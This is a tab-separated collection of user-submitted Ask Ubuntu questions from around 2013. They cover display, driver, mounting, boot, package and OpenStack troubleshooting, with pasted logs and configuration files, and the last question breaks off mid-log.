291643	multiple monitor setup - randomly one monitor is detected as removed and added again	i have a 3 monitor setup , all 3 same viewsonic model , new ( less than a year ) . randomly , monitor 1 will be detected as removed and added again ( from syslog ) : may 6 21:47:33 athena colord : device removed : xrandr-viewsonic corporation-vx2451 serie-se2114021213 may 6 21:47:34 athena colord : device added : xrandr-viewsonic corporation-vx2451 serie-se2114021213 sometimes it happens more than 5 times per day , sometimes 0 ( but it is always monitor 1 ) when it happens , all my monitors would do blank for 2 secs , then when all 3 turn on again , all windows which were in monitor 1 move to monitor 2 . system details : radeon hd 7770 , fglrx driver from xorg-edgers ppa monitor 1 = dp ( with dp-dvi adapter ) , monitor 2 = dvi , monitor 3 = hdmi , on same card . lspci|grep vga output : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati cape verde xt [ radeon hd 7770 ghz edition ] fglrxinfo output : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7700 series opengl version string : 4.2.12172 compatibility profile context 12.10.17 uname -a output : linux athena 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux cat /etc/lsb-release : distrib_id=ubuntu distrib_release=13.04 distrib_codename=raring distrib_description= '' ubuntu 13.04 '' wmctrl -d : 0 * dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 1 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 2 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 3 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 4 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 5 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 6 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 7 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a 8 - dg : 17280x3258 vp : 0,0 wa : 0,0 5760x1086 n/a already checked for any loose cables/ports , disconnected all and reconnected firmly . any advice ? thanks .
291646	bmp c library to open and save image	can anyone recommend me a c library for loading and saving .bmp images . i need to load the image , edit some bits , and then save it . i have found the devil library , but i ca n't find the way to use it in ubuntu . ps . i 'm a beginner so if anyone could explain the whole process from downloading the library , using it in my code for loading and saving , to compiling . or just give me some links that you have already used ...
291647	i need to load driver for epson perfection 4180 scanner	the scanner does n't seem to have an easy to load driver that i can get at the epson site . the options that are available seem to need to be installed at the terminal prompt . i am lost at that point . the files that are available for download are : perfection 4180… scanner driver linux latest for gcc 3.2/3.3 all language 12-21-2011 perfection 4180… scanner driver linux latest for gcc 3.4 or later all language 12-21-2011 perfection 4180… scanner driver linux latest iscan plugin package for gcc 3.2/3.3 all language 12-21-2011 perfection 4180… scanner driver linux latest iscan plugin package for gcc 3.4 or later all language 12-21-2011 i am confused on which of these files i need .
291648	is it possible to run adobe master collection cs6 in ubuntu	i do video editing , music making , web design , and photo editing . i do n't want to have to use another application to do what i can get from adobe . i also want to switch to ubuntu . i have windows 8 at the moment .
291649	disable `` search photos '' lens shortcut ( super+c ) and assign to shutter	i used to use super+c to take a screenshot with shutter . after upgrading to ubuntu 13.04 , i have found the super+c shortcut to be mapped to a `` search photos '' lens . i tried going through compiz ( and google ) , but i have n't found a solution yet . is there anyway to remove this shortcut ? i 've tried setting it in shutter , but it wo n't override unity .
291656	after a failure 13.04 distupgrade , mount is not working anymore with cifs	i have a problem after doing a failure upgrading to the 13.04 distribution , after installing all packages the script was stopped before deleting all packages ( due to a network interrupt ) . after rebooting the pc , everything seems to work , but when i have checked no one of the remote fs noted on /etc/fstab was mounted . when try to mount `` by hand '' : mount /path/mountppoint i get no error , but the remote filesystem does n't mount either . trying using mount command without using fstab options , and i got a very confused error : $ sudo mount -t cifs -o username=usr , password=pass //192.168.1.40/media /mnt/media column : opci贸n incorrecta -- 芦o usage : column [ -tx ] [ -c columns ] [ -s sep ] [ file ... ] error messages are in spanish , but they said that `` column : incorrect option '' and the usage of the column command . i have tried to force the installation of some packages that could be involved ( bsdmainutils , mount , mountall and cifs.utils ) : sudo apt-get -- reinstall install bsdmainutils sudo apt-get -- reinstall install cifs-utils ( ... ) but the result is still the same . if i use nfs instead of cifs , the result is very similar : mount -t nfs //192.168.1.40/usb_hdd_4 /c/usb_hdd_4 column : nfs : no existe el archivo o el directorio column : //192.168.1.40/usb_hdd_4 : no existe el archivo o el directorio any clue ?
291659	ubuntu 13.04 does not boot after install - single disk no windows	hi i have a hp elite 7300 series desktop pc with efi bios , no legacy bios option . i have created following partitions on my 80gb disk and installed ubuntu 13.04 . efi partition is flagged as boot . i have selected something else option and selected first ext4 as / partition and second ext4 as /home . installation went fine and rebooted my pc but did not boot . rebooted with my usb again and tried to run boot-repair . it did run without any problem but again i was not able to boot again : here is the report generated by boot-repair : http : //paste.ubuntu.com/5639288/ i am frustrated . please help . edit : 13.04 sucks ! returning to 12.10 edit 2 i have used an other pc with legacy bios to install ubuntu 13.04 on my hard drive and then pluged in to my efi bois pc . now it works .
291666	why does n't `sudo cd /var/named` work ?	i want to cd into /var/named but it gives me a permission denied error , and when i want to use sudo to do this i am not permitted . what is the technical reason for this , and is it possible to do this some other way ?
291667	rhythombox does n't run m3u files	i 'm trying to listen to some radio station by downloading a m3u files and open it then sync with the server and then running the radio the problem that rhythombox does n't running that files any help ? ?
291668	var partition refuses to unmount	i have /var on a separate partition on two computers using the reiserfs filesystem . everytime i reboot , or shutdown my computers /var refuses to unmount claiming the device is busy . i then have to go through fsck checking the partition everytime i turn my computer back on . is there anything i can do to fix this aside from stopping the check of that partition on boot ? i 'm using 13.04 64bit .
291670	i got a general protection fault while transferring files	so i was transferring files from one portable hard disk to another ( i had two of them connected to the laptop and suddenly the whole thing crashed . any idea why this could happen ? should i be worried ? i 'm using ubuntu 12.04 .
291671	13.04 - i changed resolution , , now unity is missing	i changed the resolution on one of my 13.04 dual monitors , and now i lost unity , and icons . is there any trick to getting it back ? i am sort of stuck . i had the same problem earlier , and ended up having to re-install . i really want to avoid re-installing again . any help would be appreciated .
291673	problems with ubuntu software system	i have some problem with ubuntu software system . once i open it up . it closes automatically without any permittion can someone help me out please because i dont really get this . when i run it through terminal this is the feedback i get from the that vangjush @ vangjush : ~ $ software-center 2013-05-06 21:41:29,532 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-05-06 21:41:29,540 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-05-06 21:41:30,052 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-05-06 21:41:30,061 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-05-06 21:41:30,061 - root - error - could not find any typelib for launchpadintegration 2013-05-06 21:41:30,217 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-05-06 21:41:30,555 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 257 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) 2013-05-06 21:41:31,504 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 277 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 182 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1387 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1325 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 151 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 173 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 324 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 119 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 253 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 238 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 277 , in __contains__ return self._cache.__contains__ ( k ) **attributeerror : 'nonetype ' object has no attribute '__contains__'** whereas when i try to reinstall software system i get this error that stops me the installation . vangjush @ vangjush : ~ $ sudo apt-get install -- reinstall software-center [ sudo ] password for vangjush : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : calligra-l10n-engb camlp4 cdparanoia coq coq-theories coqide k3b k3b-data k3b-i18n kde-l10n-engb kde-l10n-zhcn kdevelop-l10n kdevelop-php-docs-l10n kdevelop-php-l10n language-pack-kde-en ledit libcoq-ocaml libflac++6 libk3b6 libkcddb4 liblablgtk2-gnome-ocaml liblablgtk2-ocaml libncurses5-dev libtinfo-dev ocaml-base-nox ocaml-interp ocaml-nox use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 628 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //al.archive.ubuntu.com/ubuntu/ quantal-updates/main software-center all 5.4.1.4 [ 628 kb ] fetched 628 kb in 2s ( 225 kb/s ) ( reading database ... 287516 files and directories currently installed . ) preparing to replace software-center 5.4.1.4 ( using ... /software-center_5.4.1.4_all.deb ) ... unpacking replacement software-center ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... setting up software-center ( 5.4.1.4 ) ... updating software catalog ... this may take a moment . info : softwarecenter.db.pkginfo_impl.aptcache : aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 170 , in < module > result = rebuild_database ( pathname ) file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 1109 , in rebuild_database cache.open ( ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 257 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) **systemerror : e : malformed line 57 in source list /etc/apt/sources.list ( dist parse ) ** thank you in advance .
291674	ubuntu 12.04 autoclick	i dont know how to search for this problem.. more and more frequently when i start and login my machine , it opens the desktop , and as i open a folder , or if i go on the internet , it will just start opening tabs after tabs after tabs.. i only know how to shut of the machine to fix this , and hope next time it will have gone away . sometimes i have to restart two times for it to begone . what is this ? how can i fix this ? thanks
291675	custom keyboard shortcuts not working	hi i have created two custom keyboard short cuts as my brightness settings have disappeared since installing nvidia driver . these two short cuts are as follows : name : brightness_up command : xbacklight -inc 10 binding : monitor brightness up key name : brightness_down command : xbacklight -dec 10 binding : monitor brightness down key however nothing happens when i reboot and attempt to use these commands . i have xbacklight installed as each of these commands work perfectly fine when typed into the terminal . i have enabled the brightness control on my nvdia drivers by adding a script : /usr/share/x11/xorg.conf.d/10-nvidia-brightness.conf the contents of which is section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9400m '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection however when i try and use the keyboard shortcuts nothing happens . i thought this may be because they are already mapped in the system so i tried mapping them to shift++ and shift+_ but those bindings also did not work . any ideas on how : a ) i can get the system brightness controls to work again . b ) how i can get the custom short cuts to work using xbacklight . i am running ubuntu 13.04 on a late 2009 macbook 6,1 ( yes i know ... , however i am solely using ubuntu on this device no os x can be found : d )
291678	error when copying from desktop to any other location	i recently installed xubuntu and there were a lot of differences i noticed between xfce and gnome . i did n't like thunar that much ( mainly because of the searching feature - even catfish does n't posses half of the capabilities nautilus does ) . so i installed nautilus and made it the preferred file manager from exo-preferred-applications . at first everything seemed working - the searching function , places , bookmarks etc . however , i consequently tried copying a file from the desktop to my home folder and the following error occurred : and after pressing skip , another one : i tried uninstalling thunar and xfdesktop hoping that nautilus would 'take over ' the desktop but that did n't happen . also tried with a symlink for xfdesktop - > nautilus as suggested in some thread but that did n't do the trick either . the error occurs whenever i try copying or moving something ( a file or a folder ) from the desktop to another location ( by ctrl+c or copy from the context menu ) . copying and moving works from and to other locations ( even from a random location to the desktop but not from it ) . the strangest part is that when i drag and drop a file or folder from the desktop to the desired location it works without any errors . i would be grateful if someone could help me . thanks in advance !
291680	dual boot- updating a folder from home partition in dropbox or ubuntuone ?	i have a dual boot system with ubuntu 13.04 and windows 8 in perfect harmony . i have installed in windows an application so that i can mount the home ( ext4 ) partition in windows . i am using windows 8 only for dj and audio production purposes , with traktor and ableton installed . i am using dropbox and ubuntu one so i want to sync my dropbox and ubuntu one files that i have uploaded to cloud from both systems . if i am in windows then the music of my home partition will be synced from ubuntu one . is that possible ? what should i do ?
291681	how do i make hud work with eclipse ?	i have already tried this , but i still have no entries in hud regarding eclipse ( indigo , manually installed ) . is there some way to make hud work with eclipse ?
291682	wmctrl - wait until window is closed	i 'm using the wmctrl to close running windows when i want shutdown the computer . it 's because i need to save workspace in eclipse and also i do n't want to lost my opened tabs in chrome . i wrote a little script that accomplish the thing , but it 's not perfect . sometimes windows do n't close gracefully so i 'm loosing my tabs or changes in source code . is there any way to tell wmctrl wait until the window is closed ? my script depends now on 3 seconds sleep ( the problematic line ) , but it 's obviously not a good solution . wmctrl -c chrome wmctrl -c eclipse sleep 3 poweroff
291685	i dont see pop-up with usb connected	during flash of nexus 7 on step 3 of install touch on wiki.ubuntu.com 3.3 plug the device into the computer via the usb cable . depending on the installed android version , a popup will show up on the device with the host key that needs to be accepted for the device to communicate with the workstation . this wont show up usb debugging is on ... ..build is 4.2.2
291688	`` invalid argument '' when trying to mount my usb	on ubuntu , i 'm trying to mount my usb [ ] dmesg ... usb mass storage support registered . ... scsi 2:0:0:0 direct-access kingston datatraveler 2.0 ... sd 2:0:0:0 [ sdb ] 15679488 512-byte logical blocks : ( 8.02 gb/7.47 gib ) ... sd 2:0:0:0 write protect is off ( so i assume that /dev/sdb is my usb pendrive ) [ ] mkdir /mnt/usb [ ] mount /dev/sdb /mnt/usb mount : mounting /dev/sdb on /mnt/usb failed : invalid argument i also tried with `` -t ext4 '' with no success . what am i doing wrong ? thank you very much .
291690	how can i run ubuntu via my vm ?	i 'm trying to install ubuntu 12.04 to run in virtualbox alongside my win7 64bit os , without having to dual-boot . i added the 64-bit ubuntu iso to my vm , and powered it up so to proceed with the installation , but it prompted me with this error : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . why does it give me this error , seeing as i have a 64bit processor ? is there a way that i can run ubuntu via my vm in the first place ?
291695	why does empathy ask for permission to access my remote accounts ?	in order to let empathy work , ubuntu asks permission to collect information about me . why is it that when i choose that i do not want ubuntu to collect information about me , empathy does not work ? in fedora and opensuse i do not have this problem !
291696	how to make an already live ubuntu pen-drive , a persistent one ?	i have created a usb flash drive with the latest ubuntu version , but it is not persistent . how can i make it persistent without repeating the whole process ?
291697	lubuntu ( lxde desktop ) - is there any device notifier in panel ?	i have lubuntu 13.04 and i 'd like to know if there is any device notifier to show in lxde panel in order to safetely remove safely or manage usb and other device without opening lxde folder manager ? thanks
291698	installing cuda toolkit	i am trying to set up my computer for cuda development as per this instruction . before installation it recommends uninstalling nvidia drivers and suggest running apt-get remove -- purge `` nvidia* '' . but this command will also remove ubuntu-desktop . is this safe ? i do n't want to fall in bigger mess while solving smaller problems . my laptop runs ubuntu 12.04 64-bit , nvidia gt325m , optimus graphics card . please also take a note is the instruction good enough or not . i know optimus makes serious trouble with linux and i want to play on safe side here .
291701	lubuntu - command to use in .desktop file to launch application reduced to panel	i have a .desktop file : [ desktop entry ] encoding=utf-8 name=thunderbird comment=mail manager exec=thunderbird terminal=false type=application nodisplay=false hidden=false is there a command to use in this file to let application running directly reduced to system panel ? thanks
291708	internet connection not working	my laptop is saying that it has connected to the internet in my house but every now and again a message box appears saying that it 's disconnected and offline but yet in the network options it still says that im connected to the router in my home ? can anyone help ?
291710	how to use the shortcut `` www '' ?	just curious : as you can see , after the `` launch web browser '' , the shortcut is set to `` www '' by default . i know i can change it , but i 'm just curious why it is `` www '' ? and how should i press `` www '' ? thanks .
291711	can i install ubuntu from an external hard drive/ can i run fedora and ubuntu together on one system ?	hi i am a totaly new user of ubuntu . i have recently built a new system and want to install ubuntu 13.04 , i have downloaded onto an external usb hard drive from a windows system that is running xp . my question is this , if i turn on my new system that is running a blank hard drive but the external hard drive with ubuntu saved on it is plugged in will the computer recognise it and load it . i have used the normal download of the iso instead of opting to create a live usb , was this the right way to go . my next question is i know i can use ubuntu along side windows os but can i run ubuntu along side fedora linux with ubuntu as a dual operating system instead of windows as a dual os system ?
291713	ca n't connect google nexus in ubuntu 13.04	after upgrading from 12.10 to 13.04 i am having issues with connecting my google nexus to my ubuntu machine . i have found this script somewhere on the internet but it does not seem to work now : # ! /bin/bash if [ `lsusb |grep google |wc -l` == 0 ] ; then echo `` plug in the device '' exit 1 fi if [ `dpkg -l mtpfs |wc -l` == `` 0 '' ] ; then sudo apt-get update & & sudo apt-get install mtpfs fi rules_file=/etc/udev/rules.d/60-android.rules if [ ! -f $ rules_file ] ; then vp=`lsusb|grep google|cut -d `` `` -f 6` vendor=`echo $ vp | cut -d ' : ' -f 1` product=`echo $ vp | cut -d ' : ' -f 2` rule= '' subsystem==\ '' usb\ '' , attr { idvendor } ==\ '' $ vendor\ '' , attr { idproduct } ==\ '' $ product\ '' , mode=\ '' 0600\ '' , group=\ '' plugdev\ '' owner=\ '' $ user\ '' '' sudo bash -c `` echo $ rule > $ rules_file '' fi mount_point=/media/nexus if [ ! -d $ mount_point ] ; then sudo mkdir $ mount_point sudo chmod 775 $ mount_point fi sudo mtpfs -o allow_other $ mount_point after launching it i get : unable to open ~/.mtpz-data for reading , mtpz disabled.listing raw device ( s ) device 0 ( vid=xxxx and pid=yyyy ) is a google inc ( for lg electronics/samsung ) nexus 4/10 ( mtp ) . found 1 device ( s ) : google inc ( for lg electronics/samsung ) : nexus 4/10 ( mtp ) ( xxxx : yyyy ) @ bus 2 , dev 4 attempting to connect device ignoring libusb_claim_interface ( ) = -6ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device android device detected , assigning default bug flags error 1 : get storage information failed . error 2 : ptp layer error 02fe : get_handles_recursively ( ) : could not get object handles . error 2 : error 02fe : ptp : protocol error , data expected listing file information on device with name : ( null ) libmtp_get_storage ( ) failed : -1
291714	maintaining kernel modules submitted in the software center over kernel updates	this question is specifically for submitting a package in the software center . if i wish to submit a package that contains a kernel module ( *.ko ) which will install in /lib/modules/ and there is a kernel update with a new patch level number , i.e . 3.2.0- , how will my package 's module be handled as it will not be installed in the new /lib/modules/ ? is this something that i have to maintain myself maybe via a startup script/check and manually copy/install the *.ko file to the new kernel modules location ?
291720	what 's the statue of wifi direct in linux/ubuntu	android now supports wifi-direct by default . windows 8 has also this capability . what 's the statue of wi-di in ubuntu ? especially with ubuntu touch coming i 'd be very useful . i need this technology for developing a ubuntu software and i havenât seen anything concerning ubuntu and wifi direct . i fear i 'll have to switch to android or windows 8 . thanks
291722	how to search for apt packages with a specific substring in their names only ?	in the past i used to search for a package specifying a part of its name in synaptic , as far as i can remember . now it searches in package descriptions too and this is very inconvenient as it gives a huge lot of irrelevant results . i have tried using console aptitude and apt-cache search but both of them do the same . so how do i search in the names only ( ignoring the descriptions ) ?
291727	meaning of this ps aux output	i wanted to be sure if i am running named . so did following : ps aux | grep named root 6613 0.0 0.0 13588 920 pts/2 s+ 23:12 0:00 grep -- color=auto named what this output exactly means ?
291729	how can i get a music streaming service of my choice work as an app ?	spotify has launched a dedicated ubuntu player some time ago ... but it doesnt make any difference to me as my country does n't have spotify ... though it does have many music streaming services of its own ! nuvola players also does n't include those services ... i tried fogger but the services need flash support ... how can i get any of them working on ubuntu ? note : i am using spotify as an example ( to indicate a family of online music streeming services ) , coz spotify has a standalone app.i do not want to use spotify
291730	upgrade from ubuntu 12.10 to 13.04	i was updating my os from ubuntu 12.10 to 13.04 . i had to shutdown my laptop in between the update through internet . on restarting my laptop does not boot properly , all the applications and hardware do not function properly as also i am unable to connect to the internet . may be because the update was terminated mid way . what should i do to retrieve the os without connecting to the internet . or can i download the update or the programme on a usb disk and retrieve the system .
291732	persistent file not working for 13.04	i successfully installed 13.04 ( 64 ) on a wd `` my passport '' ( 1 tb ) without any bumps in the road . works great ... so i wanted to stream line it a bit more and try the `` liveusb '' on a 16 gb thumb drive . i used 4 different usb installers , last was unetbootin ( including ubuntu startup ) . i set the persistent file at 4 gb to allow for a complete setup . none have set the persistent file correctly ( that is my guess ) , as none of my changes are saved . i 've read several answers to this problem all of which had no relevant info ( dead ends ) or what was said was already present . such as edit the syslinux.cfg file for -- persistent . my guess is that it has to do with `` permissions '' , tried setting up a user as administrator , it too failed to save . it seems to me that if they are now using ssdd to replace mechanical hdd , then thumbs drives should work for a standard load/install ... please note have searched the writers sites for `` support '' with zero results . i formatted the drive `` fat32 '' here are the drive files ; 01/17/2013 12:06 pm 1,345,530 ubnkern 04/24/2013 01:10 pm 22,252,127 ubninit 05/06/2013 02:08 pm < dir > .disk 05/06/2013 02:08 pm < dir > efi 05/06/2013 02:08 pm < dir > boot 05/06/2013 02:08 pm < dir > casper 05/06/2013 02:08 pm < dir > dists 05/06/2013 02:08 pm < dir > install 05/06/2013 02:08 pm < dir > isolinux 05/06/2013 02:08 pm < dir > pics 05/06/2013 02:08 pm < dir > pool 05/06/2013 02:08 pm < dir > preseed 05/06/2013 02:08 pm 1,053 ubnpathl.txt 04/24/2013 02:25 pm 229 readme.diskdefines 04/24/2013 02:23 pm 134 autorun.inf 04/24/2013 02:25 pm 18,354 md5sum.txt 04/23/2013 10:10 am 2,559,512 wubi.exe 05/06/2013 02:11 pm 11,694 ubnfilel.txt > > 05/06/2013 02:11 pm 1,880 syslinux.cfg 05/06/2013 02:11 pm 60,928 menu.c32 > > 05/06/2013 02:24 pm 4,294,963,200 casper-rw as you can see , the casper-rw is there . also , here is the syslinux.cfg file contents ; default menu.c32 prompt 0 menu title unetbootin timeout 100 label unetbootindefault menu label default kernel /ubnkern append initrd=/ubninit file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- persistent label ubnentry0 menu label ^help kernel /ubnkern append initrd=/ubninit persistent label ubnentry1 menu label ^try ubuntu without installing kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- persistent label ubnentry2 menu label ^install ubuntu kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- persistent label ubnentry3 menu label ^check disc for defects kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz boot=casper integrity-check quiet splash -- persistent label ubnentry4 menu label test ^memory kernel /install/mt86plus append initrd=/ubninit persistent label ubnentry5 menu label ^boot from first hard disk kernel /ubnkern append initrd=/ubninit persistent label ubnentry6 menu label try ubuntu without installing kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- persistent label ubnentry7 menu label install ubuntu kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- persistent label ubnentry8 menu label oem install ( for manufacturers ) kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash oem-config/enable=true -- persistent label ubnentry9 menu label check disc for defects kernel /casper/vmlinuz.efi append initrd=/casper/initrd.lz boot=casper integrity-check quiet splash -- persistent here is an idea i had , should these `` casper '' references read casper-rw ? edit # 3 here is the `` grub.cfg '' file contents ; if loadfont /boot/grub/font.pf2 ; then set gfxmode=auto insmod efi_gop insmod efi_uga insmod gfxterm terminal_output gfxterm fi set menu_color_normal=white/black set menu_color_highlight=black/light-gray menuentry `` try ubuntu without installing '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper quiet splash -- initrd /casper/initrd.lz } menuentry `` install ubuntu '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz } menuentry `` oem install ( for manufacturers ) '' { set gfxpayload=keep linux /casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash oem-config/enable=true -- initrd /casper/initrd.lz } menuentry `` check disc for defects '' { set gfxpayload=keep linux /casper/vmlinuz.efi boot=casper integrity-check quiet splash -- initrd /casper/initrd.lz } ok , this boots straight to the desktop , no prompts for login ( natch ) . i 'm thinking grub is the problem . here is the sequence for boot ; boot menu select efi usb then there are 4 choices from grub ( i believe ) , they are ; try ubuntu ( without installing ) install ubuntu oem install check disc natch i am choosing `` try '' . and i think that is the real issue . efforts to create user fail after reboot . nothing seems to be saved/written to the casper-rw file . there are 9 items in the syslinux.cfg , grub shows 4 ...
291735	how to increase size of partition to take up unallocated space	i have a ubuntu installation ( sda3 ) with unallocated space that i want to use to use to increase the space of sda5 on the following picture : the only problem is i cant resize it , gparted says im already at the maximum size for that partition :
291736	relation error between nova-compute and nova cloud controller	i have successfully setup open stack cloud from the documentation : ubuntu cloud infrastructure . my juju environment file : environments : maas : type : maas maas-server : 'http : //192.168.122.4:80/maas' maas-oauth : 'np2bedgzye5ktaghzc : xen8gm5bdtwj2chaw4 : rnx9dbqs7cv2rrz9g9jxncpyg4usktbl' admin-secret : 'nothing' default-series : precise all the nodes prepared by juju for openstack have one lan card.my maas server has one lan card and has the dhcp server . i am not using any dns , as i am using the /etc/hosts file to fix it . here comes the problem : when i run juju status , i see a relation error between at cloud-compute against nova-cloud-controller . i am able to login to openstack dashboard and can move in all the sections except manage compute section , and this may be because of the error between these two servers . when i run juju debug-log i see following result : 2013-05-06 21:02:53,108 unit : nova-cloud-controller/1 : hook.output debug : flushed values for hook 'cloud-compute-relation-joined ' on 'cloud-compute:22' setting changed : u'ec2_host'=u'node-aabbccddeef4.localdomain ' ( was unset ) setting changed : u'network_manager'=u'flatdhcpmanager ' ( was unset ) setting changed : u'volume_service'=u'nova-volume ' ( was unset ) 2013-05-06 21:02:53,108 unit : nova-cloud-controller/1 : hook.executor debug : hook complete : /var/lib/juju/units/nova-cloud-controller-1/charm/hooks/cloud-compute-relation-joined 2013-05-06 21:02:53,115 unit : nova-cloud-controller/1 : hook.scheduler debug : executing hook for nova-compute/0 : modified 2013-05-06 21:02:53,116 unit : nova-cloud-controller/1 : unit.relation.lifecycle debug : executing hook cloud-compute-relation-changed 2013-05-06 21:02:53,116 unit : nova-cloud-controller/1 : hook.executor debug : running hook : /var/lib/juju/units/nova-cloud-controller-1/charm/hooks/cloud-compute-relation-changed 2013-05-06 21:02:53,375 unit : nova-compute/0 : hook.scheduler debug : settings changed : ( ( 'nova-cloud-controller/1 ' , 1 ) , ) 2013-05-06 21:02:53,378 unit : nova-compute/0 : hook.scheduler debug : executing hook for nova-cloud-controller/1 : modified 2013-05-06 21:02:53,378 unit : nova-compute/0 : unit.relation.lifecycle debug : executing hook cloud-compute-relation-changed 2013-05-06 21:02:53,379 unit : nova-compute/0 : hook.executor debug : running hook : /var/lib/juju/units/nova-compute-0/charm/hooks/cloud-compute-relation-changed 2013-05-06 21:02:54,133 unit : nova-cloud-controller/1 : hook.output debug : hook cloud-compute-relation-changed exited , exit code 0 . 2013-05-06 21:02:54,161 unit : nova-cloud-controller/1 : hook.executor debug : hook complete : /var/lib/juju/units/nova-cloud-controller-1/charm/hooks/cloud-compute-relation-changed 2013-05-06 21:02:54,555 unit : nova-compute/0 : hook.output info : /var/lib/juju/units/nova-compute-0/charm/hooks/cloud-compute-relation-changed : configuring flatdhcpmanager network manager 2013-05-06 